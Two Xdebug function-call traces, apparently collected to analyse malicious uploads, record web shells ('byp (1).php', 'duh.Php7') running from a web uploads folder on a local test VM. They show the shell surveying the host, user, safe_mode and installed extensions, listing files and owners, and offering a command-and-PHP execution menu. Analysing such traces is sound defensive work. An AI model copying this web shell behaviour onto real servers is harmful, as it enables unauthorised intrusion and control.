2 170 R '/var/www/html/uploads/.htaccess'
2 171 0 0.007084 495768 perms 1 /var/www/html/uploads/byp (1).php 42 1 '.htaccess'
3 172 0 0.007101 495768 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 '.htaccess'
3 172 1 0.007116 495808
3 172 R TRUE
3 173 0 0.007129 495768 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 '.htaccess'
3 173 1 0.007142 495808
3 173 R 33188
3 174 0 0.007154 495768 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 33188
3 174 1 0.007167 496152
3 174 R '100644'
3 175 0 0.007180 496088 substr 0 /var/www/html/uploads/byp (1).php 57 2 '100644' -4
3 175 1 0.007193 496184
3 175 R '0644'
2 171 1 0.007206 495800
2 171 R '0644'
2 176 0 0.007221 494488 function_exists 0 /var/www/html/uploads/byp (1).php 42 1 'posix_getpwuid'
2 176 1 0.007234 494528
2 176 R TRUE
2 177 0 0.007247 494488 function_exists 0 /var/www/html/uploads/byp (1).php 42 1 'posix_getgrgid'
2 177 1 0.007260 494528
2 177 R TRUE
2 178 0 0.007273 494488 fileowner 0 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
2 178 1 0.007287 494528
2 178 R 1000
2 179 0 0.007299 494488 posix_getpwuid 0 /var/www/html/uploads/byp (1).php 42 1 1000
2 179 1 0.007329 495304
2 179 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/byp (1).php 42 $own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 180 0 0.007372 494504 filegroup 0 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
2 180 1 0.007385 494544
2 180 R 1000
2 181 0 0.007398 494504 posix_getgrgid 0 /var/www/html/uploads/byp (1).php 42 1 1000
2 181 1 0.007429 495160
2 181 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/byp (1).php 42 $grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 182 0 0.007465 494584 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 182 1 0.007478 494664
2 182 R '/var/www/html/uploads'
2 183 0 0.007493 494728 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 183 1 0.007507 494808
2 183 R '/var/www/html/uploads'
2 184 0 0.007521 494824 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 184 1 0.007534 494904
2 184 R '/var/www/html/uploads'
2 185 0 0.007549 495144 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 185 1 0.007561 495224
2 185 R '/var/www/html/uploads'
2 186 0 0.007575 495272 realpath 0 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
2 186 1 0.007588 495368
2 186 R '/var/www/html/uploads/byp (1).php'
2 187 0 0.007605 495528 get_color 1 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
3 188 0 0.007617 495528 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'byp (1).php'
3 188 1 0.007632 495568
3 188 R FALSE
3 189 0 0.007645 495528 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'byp (1).php'
3 189 1 0.007659 495568
3 189 R FALSE
3 190 0 0.007671 495528 is_readable 0 /var/www/html/uploads/byp (1).php 56 1 'byp (1).php'
3 190 1 0.007685 495568
3 190 R TRUE
2 A /var/www/html/uploads/byp (1).php 56 $c = ''
3 191 0 0.007710 495528 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'byp (1).php'
3 191 1 0.007724 495568
3 191 R FALSE
3 192 0 0.007737 495528 is_readable 0 /var/www/html/uploads/byp (1).php 56 1 'byp (1).php'
3 192 1 0.007751 495568
3 192 R TRUE
2 187 1 0.007765 495528
2 187 R ''
2 193 0 0.007777 495528 perms 1 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
3 194 0 0.007789 495528 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 'byp (1).php'
3 194 1 0.007804 495568
3 194 R TRUE
3 195 0 0.007816 495528 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 'byp (1).php'
3 195 1 0.007828 495568
3 195 R 33204
3 196 0 0.007841 495528 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 33204
3 196 1 0.007855 495912
3 196 R '100664'
3 197 0 0.007868 495848 substr 0 /var/www/html/uploads/byp (1).php 57 2 '100664' -4
3 197 1 0.007884 495944
3 197 R '0664'
2 193 1 0.007897 495560
2 193 R '0664'
2 198 0 0.007910 495784 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 198 1 0.007931 495864
2 198 R '/var/www/html/uploads'
2 199 0 0.007946 495784 realpath 0 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
2 199 1 0.007960 495880
2 199 R '/var/www/html/uploads/byp (1).php'
2 200 0 0.007975 495784 perms 1 /var/www/html/uploads/byp (1).php 42 1 'byp (1).php'
3 201 0 0.007987 495784 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 'byp (1).php'
3 201 1 0.008002 495824
3 201 R TRUE
3 202 0 0.008015 495784 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 'byp (1).php'
3 202 1 0.008028 495824
3 202 R 33204
3 203 0 0.008040 495784 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 33204
3 203 1 0.008053 496168
3 203 R '100664'
3 204 0 0.008066 496104 substr 0 /var/www/html/uploads/byp (1).php 57 2 '100664' -4
3 204 1 0.008079 496200
3 204 R '0664'
2 200 1 0.008092 495816
2 200 R '0664'
2 205 0 0.008106 494504 function_exists 0 /var/www/html/uploads/byp (1).php 42 1 'posix_getpwuid'
2 205 1 0.008120 494544
2 205 R TRUE
2 206 0 0.008133 494504 function_exists 0 /var/www/html/uploads/byp (1).php 42 1 'posix_getgrgid'
2 206 1 0.008146 494544
2 206 R TRUE
2 207 0 0.008158 494504 fileowner 0 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
2 207 1 0.008173 494544
2 207 R 0
2 208 0 0.008185 494504 posix_getpwuid 0 /var/www/html/uploads/byp (1).php 42 1 0
2 208 1 0.008208 495304
2 208 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/byp (1).php 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 209 0 0.008250 494488 filegroup 0 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
2 209 1 0.008263 494528
2 209 R 0
2 210 0 0.008275 494488 posix_getgrgid 0 /var/www/html/uploads/byp (1).php 42 1 0
2 210 1 0.008297 495144
2 210 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/byp (1).php 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 211 0 0.008331 494568 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 211 1 0.008344 494648
2 211 R '/var/www/html/uploads'
2 212 0 0.008359 494712 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 212 1 0.008373 494792
2 212 R '/var/www/html/uploads'
2 213 0 0.008387 494808 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 213 1 0.008400 494888
2 213 R '/var/www/html/uploads'
2 214 0 0.008415 495128 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 214 1 0.008428 495208
2 214 R '/var/www/html/uploads'
2 215 0 0.008442 495256 realpath 0 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
2 215 1 0.008491 495352
2 215 R '/var/www/html/uploads/prepend.php'
2 216 0 0.008508 495512 get_color 1 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
3 217 0 0.008522 495512 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'prepend.php'
3 217 1 0.008538 495552
3 217 R FALSE
3 218 0 0.008551 495512 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'prepend.php'
3 218 1 0.008566 495552
3 218 R FALSE
3 219 0 0.008579 495512 is_readable 0 /var/www/html/uploads/byp (1).php 56 1 'prepend.php'
3 219 1 0.008593 495552
3 219 R TRUE
2 A /var/www/html/uploads/byp (1).php 56 $c = ''
3 220 0 0.008618 495512 is_writable 0 /var/www/html/uploads/byp (1).php 56 1 'prepend.php'
3 220 1 0.008633 495552
3 220 R FALSE
3 221 0 0.008646 495512 is_readable 0 /var/www/html/uploads/byp (1).php 56 1 'prepend.php'
3 221 1 0.008661 495552
3 221 R TRUE
2 216 1 0.008674 495512
2 216 R ''
2 222 0 0.008687 495512 perms 1 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
3 223 0 0.008705 495512 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 'prepend.php'
3 223 1 0.008720 495552
3 223 R TRUE
3 224 0 0.008733 495512 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 'prepend.php'
3 224 1 0.008802 495552
3 224 R 33261
3 225 0 0.008817 495512 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 33261
3 225 1 0.008831 495896
3 225 R '100755'
3 226 0 0.008845 495832 substr 0 /var/www/html/uploads/byp (1).php 57 2 '100755' -4
3 226 1 0.008858 495928
3 226 R '0755'
2 222 1 0.008871 495544
2 222 R '0755'
2 227 0 0.008883 495768 realpath 0 /var/www/html/uploads/byp (1).php 42 1 '.'
2 227 1 0.008898 495848
2 227 R '/var/www/html/uploads'
2 228 0 0.008912 495768 realpath 0 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
2 228 1 0.008926 495864
2 228 R '/var/www/html/uploads/prepend.php'
2 229 0 0.008941 495768 perms 1 /var/www/html/uploads/byp (1).php 42 1 'prepend.php'
3 230 0 0.008953 495768 file_exists 0 /var/www/html/uploads/byp (1).php 57 1 'prepend.php'
3 230 1 0.008969 495808
3 230 R TRUE
3 231 0 0.008983 495768 fileperms 0 /var/www/html/uploads/byp (1).php 57 1 'prepend.php'
3 231 1 0.008996 495808
3 231 R 33261
3 232 0 0.009017 495768 sprintf 0 /var/www/html/uploads/byp (1).php 57 2 '%o' 33261
3 232 1 0.009036 496152
3 232 R '100755'
3 233 0 0.009049 496088 substr 0 /var/www/html/uploads/byp (1).php 57 2 '100755' -4
3 233 1 0.009062 496184
3 233 R '0755'
2 229 1 0.009075 495800
2 229 R '0755'
1 3 1 0.009093 494488
0.009133 347200
TRACE END [2023-02-13 00:08:03.236428]
data/traces/d1f9301980fe3353e9ad011975f546ec_trace-1676258148.5641.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:16:14.461929]
1 0 1 0.000149 393512
1 3 0 0.000639 487616 {main} 1 /var/www/html/uploads/duh.Php7 0 0
2 4 0 0.000656 487616 error_reporting 0 /var/www/html/uploads/duh.Php7 2 1 0
2 4 1 0.000671 487656
2 4 R 22527
1 A /var/www/html/uploads/duh.Php7 3 $xyn = 'tunafeesh'
2 5 0 0.000703 487616 basename 0 /var/www/html/uploads/duh.Php7 6 1 '/var/www/html/uploads/duh.Php7'
2 5 1 0.000718 487688
2 5 R 'duh.Php7'
1 A /var/www/html/uploads/duh.Php7 6 $me = 'duh.Php7'
1 A /var/www/html/uploads/duh.Php7 6 $server_soft = 'Apache/2.4.52 (Ubuntu)'
2 6 0 0.000755 487656 php_uname 0 /var/www/html/uploads/duh.Php7 6 0
2 6 1 0.000768 487768
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/duh.Php7 6 $uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000802 487768 get_current_user 0 /var/www/html/uploads/duh.Php7 6 0
2 7 1 0.000839 487808
2 7 R 'osboxes'
2 8 0 0.000854 487816 getmyuid 0 /var/www/html/uploads/duh.Php7 6 0
2 8 1 0.000865 487816
2 8 R 1000
2 9 0 0.000878 487824 getmygid 0 /var/www/html/uploads/duh.Php7 6 0
2 9 1 0.000888 487824
2 9 R 1000
1 A /var/www/html/uploads/duh.Php7 6 $cur_user = 'osboxes uid:1000 gid:1000'
2 10 0 0.000912 487832 ini_get 0 /var/www/html/uploads/duh.Php7 6 1 'safe_mode'
2 10 1 0.000925 487864
2 10 R FALSE
1 A /var/www/html/uploads/duh.Php7 6 $safe_mode = FALSE
1 A /var/www/html/uploads/duh.Php7 6 $safe_mode = '<font color=#ccff00>OFF</font>'
2 11 0 0.000961 487832 getcwd 0 /var/www/html/uploads/duh.Php7 6 0
2 11 1 0.000973 487880
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php7 6 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php7 6 $bckC = '#333333'
1 A /var/www/html/uploads/duh.Php7 6 $txtC = '#999999'
2 12 0 0.001017 487880 getenv 0 /var/www/html/uploads/duh.Php7 7 1 'HTTP_HOST'
2 12 1 0.001030 487952
2 12 R 'localhost'
1 A /var/www/html/uploads/duh.Php7 7 $start = '<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-'
2 13 0 0.001072 490056 realpath 0 /var/www/html/uploads/duh.Php7 8 1 '.'
2 13 1 0.001086 490136
2 13 R '/var/www/html/uploads'
2 14 0 0.001101 490120 realpath 0 /var/www/html/uploads/duh.Php7 8 1 '.'
2 14 1 0.001113 490200
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php7 8 $menu = '<center><p id="menu"><span id="menuB"><<a href="duh.Php7">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1 A /var/www/html/uploads/duh.Php7 8 $end = '</body></html>'
1 A /var/www/html/uploads/duh.Php7 8 $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2 15 0 0.001183 490696 phpversion 0 /var/www/html/uploads/duh.Php7 10 0
2 15 1 0.001195 490760
2 15 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 16 0 0.001210 491456 zend_version 0 /var/www/html/uploads/duh.Php7 10 0
2 16 1 0.001221 491488
2 16 R '3.2.0'
2 17 0 0.001234 491488 magic_quotes 1 /var/www/html/uploads/duh.Php7 10 0
3 18 0 0.001246 491488 get_magic_quotes_gpc 0 /var/www/html/uploads/duh.Php7 46 0
3 18 1 0.001258 491488
3 18 R FALSE
2 A /var/www/html/uploads/duh.Php7 46 $x = FALSE
2 A /var/www/html/uploads/duh.Php7 46 $m = '<font color=#ccff00>OFF</font>'
2 17 1 0.001293 491488
2 17 R '<font color=#ccff00>OFF</font>'
2 19 0 0.001308 491488 curl 1 /var/www/html/uploads/duh.Php7 10 0
3 20 0 0.001324 491488 extension_loaded 0 /var/www/html/uploads/duh.Php7 47 1 'curl'
3 20 1 0.001338 491528
3 20 R TRUE
2 A /var/www/html/uploads/duh.Php7 47 $c = '<font color=crimson>ON</font>'
2 19 1 0.001362 491488
2 19 R '<font color=crimson>ON</font>'
2 21 0 0.001377 491488 reg_globals 1 /var/www/html/uploads/duh.Php7 10 0
3 22 0 0.001388 491488 ini_get 0 /var/www/html/uploads/duh.Php7 48 1 'reqister_globals'
3 22 1 0.001401 491520
3 22 R FALSE
2 A /var/www/html/uploads/duh.Php7 48 $r = '<font color=#ccff00>OFF</font>'
2 21 1 0.001425 491488
2 21 R '<font color=#ccff00>OFF</font>'
2 23 0 0.001440 491488 openbase_dir 1 /var/www/html/uploads/duh.Php7 10 0
3 24 0 0.001451 491488 ini_get 0 /var/www/html/uploads/duh.Php7 45 1 'open_basedir'
3 24 1 0.001464 491520
3 24 R ''
2 A /var/www/html/uploads/duh.Php7 45 $x = ''
2 A /var/www/html/uploads/duh.Php7 45 $o = '<font color=#ccff00>OFF</font>'
2 23 1 0.001497 491488
2 23 R '<font color=#ccff00>OFF</font>'
2 25 0 0.001512 491488 myql 1 /var/www/html/uploads/duh.Php7 10 0
3 26 0 0.001522 491488 function_exists 0 /var/www/html/uploads/duh.Php7 51 1 'mysql_connect'
3 26 1 0.001535 491528
3 26 R FALSE
2 A /var/www/html/uploads/duh.Php7 51 $m = '<font color=#ccff00>OFF</font>'
2 25 1 0.001559 491488
2 25 R '<font color=#ccff00>OFF</font>'
2 27 0 0.001574 491488 gzip 1 /var/www/html/uploads/duh.Php7 10 0
3 28 0 0.001584 491488 function_exists 0 /var/www/html/uploads/duh.Php7 53 1 'gzencode'
3 28 1 0.001597 491528
3 28 R TRUE
2 A /var/www/html/uploads/duh.Php7 53 $m = '<font color=crimson>ON</font>'
2 27 1 0.001621 491488
2 27 R '<font color=crimson>ON</font>'
2 29 0 0.001636 491488 mssql 1 /var/www/html/uploads/duh.Php7 10 0
3 30 0 0.001647 491488 function_exists 0 /var/www/html/uploads/duh.Php7 52 1 'mssql_connect'
3 30 1 0.001660 491528
3 30 R FALSE
2 A /var/www/html/uploads/duh.Php7 52 $m = '<font color=#ccff00>OFF</font>'
2 29 1 0.001683 491488
2 29 R '<font color=#ccff00>OFF</font>'
2 31 0 0.001697 491488 postgresql 1 /var/www/html/uploads/duh.Php7 10 0
3 32 0 0.001709 491488 function_exists 0 /var/www/html/uploads/duh.Php7 50 1 'pg_connect'
3 32 1 0.001722 491528
3 32 R FALSE
2 A /var/www/html/uploads/duh.Php7 50 $p = '<font color=#ccff00>OFF</font>'
2 31 1 0.001745 491488
2 31 R '<font color=#ccff00>OFF</font>'
2 33 0 0.001759 491488 oracle 1 /var/www/html/uploads/duh.Php7 10 0
3 34 0 0.001770 491488 function_exists 0 /var/www/html/uploads/duh.Php7 49 1 'ocilogon'
3 34 1 0.001783 491528
3 34 R FALSE
2 A /var/www/html/uploads/duh.Php7 49 $o = '<font color=#ccff00>OFF</font>'
2 33 1 0.001806 491488
2 33 R '<font color=#ccff00>OFF</font>'
2 35 0 0.001821 491488 disk_total_space 0 /var/www/html/uploads/duh.Php7 10 1 '/'
2 35 1 0.001836 491520
2 35 R 232015802368
2 36 0 0.001850 491488 h_size 1 /var/www/html/uploads/duh.Php7 10 1 232015802368
3 37 0 0.001863 491488 round 0 /var/www/html/uploads/duh.Php7 54 1 21608.155441284
3 37 1 0.001876 491520
3 37 R 21608
2 A /var/www/html/uploads/duh.Php7 54 $s = '216.08GB'
2 36 1 0.001900 491528
2 36 R '216.08GB'
2 38 0 0.001917 491528 disk_free_space 0 /var/www/html/uploads/duh.Php7 10 1 '/'
2 38 1 0.001931 491560
2 38 R 196418727936
2 39 0 0.001964 491528 h_size 1 /var/www/html/uploads/duh.Php7 10 1 196418727936
3 40 0 0.001979 491528 round 0 /var/www/html/uploads/duh.Php7 54 1 18292.919540405
3 40 1 0.001994 491560
3 40 R 18293
2 A /var/www/html/uploads/duh.Php7 54 $s = '182.93GB'
2 39 1 0.002019 491568
2 39 R '182.93GB'
1 A /var/www/html/uploads/duh.Php7 10 $moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '182.93GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1 A /var/www/html/uploads/duh.Php7 10 $n = 'PHP Version'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Zend Version'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Magic Quotes'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Curl'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Register Globals'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'OpenBase Dir'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'MySQL'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Gzip'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'MsSQL'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'PostgreSQL'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Oracle'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Total Space'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Used Space'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Your IP'
1 A /var/www/html/uploads/duh.Php7 10 $n = 'Server IP'
2 41 0 0.002224 491568 curpath 1 /var/www/html/uploads/duh.Php7 34 1 ''
3 42 0 0.002237 491568 getcwd 0 /var/www/html/uploads/duh.Php7 55 0
3 42 1 0.002249 491616
3 42 R '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.Php7 55 $d = '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.Php7 55 $p = ''
2 A /var/www/html/uploads/duh.Php7 55 $n = ''
3 43 0 0.002292 491616 explode 0 /var/www/html/uploads/duh.Php7 55 2 '/' '/var/www/html/uploads'
3 43 1 0.002305 492192
3 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.Php7 55 $dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.Php7 55 $i = 0
2 A /var/www/html/uploads/duh.Php7 55 $g = ''
2 A /var/www/html/uploads/duh.Php7 55 $p .= '/'
2 A /var/www/html/uploads/duh.Php7 55 $n .= '<a href="?d=/"></a>/'
2 A /var/www/html/uploads/duh.Php7 55 $i++
2 A /var/www/html/uploads/duh.Php7 55 $g = 'var'
2 A /var/www/html/uploads/duh.Php7 55 $p .= 'var/'
2 A /var/www/html/uploads/duh.Php7 55 $n .= '<a href="?d=/var/">var</a>/'
2 A /var/www/html/uploads/duh.Php7 55 $i++
2 A /var/www/html/uploads/duh.Php7 55 $g = 'www'
2 A /var/www/html/uploads/duh.Php7 55 $p .= 'www/'
2 A /var/www/html/uploads/duh.Php7 55 $n .= '<a href="?d=/var/www/">www</a>/'
2 A /var/www/html/uploads/duh.Php7 55 $i++
2 A /var/www/html/uploads/duh.Php7 55 $g = 'html'
2 A /var/www/html/uploads/duh.Php7 55 $p .= 'html/'
2 A /var/www/html/uploads/duh.Php7 55 $n .= '<a href="?d=/var/www/html/">html</a>/'
2 A /var/www/html/uploads/duh.Php7 55 $i++
2 A /var/www/html/uploads/duh.Php7 55 $g = 'uploads'
2 A /var/www/html/uploads/duh.Php7 55 $p .= 'uploads/'
2 A /var/www/html/uploads/duh.Php7 55 $n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 A /var/www/html/uploads/duh.Php7 55 $i++
2 41 1 0.002532 491760
2 41 R '<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 44 0 0.002552 491568 realpath 0 /var/www/html/uploads/duh.Php7 35 1 '.'
2 44 1 0.002565 491648
2 44 R '/var/www/html/uploads'
2 45 0 0.002580 491792 realpath 0 /var/www/html/uploads/duh.Php7 35 1 '.'
2 45 1 0.002593 491872
2 45 R '/var/www/html/uploads'
2 46 0 0.002607 491952 realpath 0 /var/www/html/uploads/duh.Php7 35 1 '.'
2 46 1 0.002620 492032
2 46 R '/var/www/html/uploads'
2 47 0 0.002634 492016 realpath 0 /var/www/html/uploads/duh.Php7 35 1 '.'
2 47 1 0.002646 492096
2 47 R '/var/www/html/uploads'
2 48 0 0.002660 492336 realpath 0 /var/www/html/uploads/duh.Php7 35 1 '.'
2 48 1 0.002672 492416
2 48 R '/var/www/html/uploads'
2 49 0 0.002685 492464 realpath 0 /var/www/html/uploads/duh.Php7 35 1 '.'
2 49 1 0.002697 492544
2 49 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php7 37 $filex = []
1 A /var/www/html/uploads/duh.Php7 38 $dirx = []
2 50 0 0.002740 491680 opendir 0 /var/www/html/uploads/duh.Php7 40 1 '.'
2 50 1 0.002758 492072
2 50 R resource(4) of type (stream)
1 A /var/www/html/uploads/duh.Php7 40 $handle = resource(4) of type (stream)
2 51 0 0.002785 492040 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 51 1 0.002805 492112
2 51 R '..'
1 A /var/www/html/uploads/duh.Php7 40 $file = '..'
2 52 0 0.002828 492072 is_dir 0 /var/www/html/uploads/duh.Php7 40 1 '..'
2 52 1 0.002843 492120
2 52 R TRUE
1 A /var/www/html/uploads/duh.Php7 40 $dirx[] .= '..'
2 53 0 0.002867 492488 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 53 1 0.002880 492560
2 53 R '.'
1 A /var/www/html/uploads/duh.Php7 40 $file = '.'
2 54 0 0.002903 492488 is_dir 0 /var/www/html/uploads/duh.Php7 40 1 '.'
2 54 1 0.002916 492528
2 54 R TRUE
1 A /var/www/html/uploads/duh.Php7 40 $dirx[] .= '.'
2 55 0 0.002938 492520 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 55 1 0.002952 492600
2 55 R 'prepend.php'
1 A /var/www/html/uploads/duh.Php7 40 $file = 'prepend.php'
2 56 0 0.002975 492528 is_dir 0 /var/www/html/uploads/duh.Php7 40 1 'prepend.php'
2 56 1 0.002989 492576
2 56 R FALSE
1 A /var/www/html/uploads/duh.Php7 40 $filex[] .= 'prepend.php'
2 57 0 0.003013 492952 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 57 1 0.003032 493024
2 57 R 'data'
1 A /var/www/html/uploads/duh.Php7 40 $file = 'data'
2 58 0 0.003056 492944 is_dir 0 /var/www/html/uploads/duh.Php7 40 1 'data'
2 58 1 0.003070 492976
2 58 R TRUE
1 A /var/www/html/uploads/duh.Php7 40 $dirx[] .= 'data'
2 59 0 0.003092 492968 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 59 1 0.003105 493048
2 59 R '.htaccess'
1 A /var/www/html/uploads/duh.Php7 40 $file = '.htaccess'
2 60 0 0.003129 492976 is_dir 0 /var/www/html/uploads/duh.Php7 40 1 '.htaccess'
2 60 1 0.003143 493024
2 60 R FALSE
1 A /var/www/html/uploads/duh.Php7 40 $filex[] .= '.htaccess'
2 61 0 0.003166 493024 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 61 1 0.003179 493104
2 61 R 'duh.Php7'
1 A /var/www/html/uploads/duh.Php7 40 $file = 'duh.Php7'
2 62 0 0.003202 493024 is_dir 0 /var/www/html/uploads/duh.Php7 40 1 'duh.Php7'
2 62 1 0.003215 493064
2 62 R FALSE
1 A /var/www/html/uploads/duh.Php7 40 $filex[] .= 'duh.Php7'
2 63 0 0.003238 493064 readdir 0 /var/www/html/uploads/duh.Php7 40 1 resource(4) of type (stream)
2 63 1 0.003252 493104
2 63 R FALSE
1 A /var/www/html/uploads/duh.Php7 40 $file = FALSE
2 64 0 0.003274 493048 asort 0 /var/www/html/uploads/duh.Php7 40 1 [0 => 'prepend.php', 1 => '.htaccess', 2 => 'duh.Php7']
2 64 1 0.003291 493080
2 64 R TRUE
2 65 0 0.003304 493072 asort 0 /var/www/html/uploads/duh.Php7 40 1 [0 => '..', 1 => '.', 2 => 'data']
2 65 1 0.003319 493104
2 65 R TRUE
1 A /var/www/html/uploads/duh.Php7 40 $i = 0
2 66 0 0.003341 493072 function_exists 0 /var/www/html/uploads/duh.Php7 41 1 'posix_getpwuid'
2 66 1 0.003354 493112
2 66 R TRUE
2 67 0 0.003366 493072 function_exists 0 /var/www/html/uploads/duh.Php7 41 1 'posix_getgrgid'
2 67 1 0.003379 493112
2 67 R TRUE
2 68 0 0.003391 493072 fileowner 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 68 1 0.003405 493104
2 68 R 0
2 69 0 0.003418 493064 posix_getpwuid 0 /var/www/html/uploads/duh.Php7 41 1 0
2 69 1 0.003443 493864
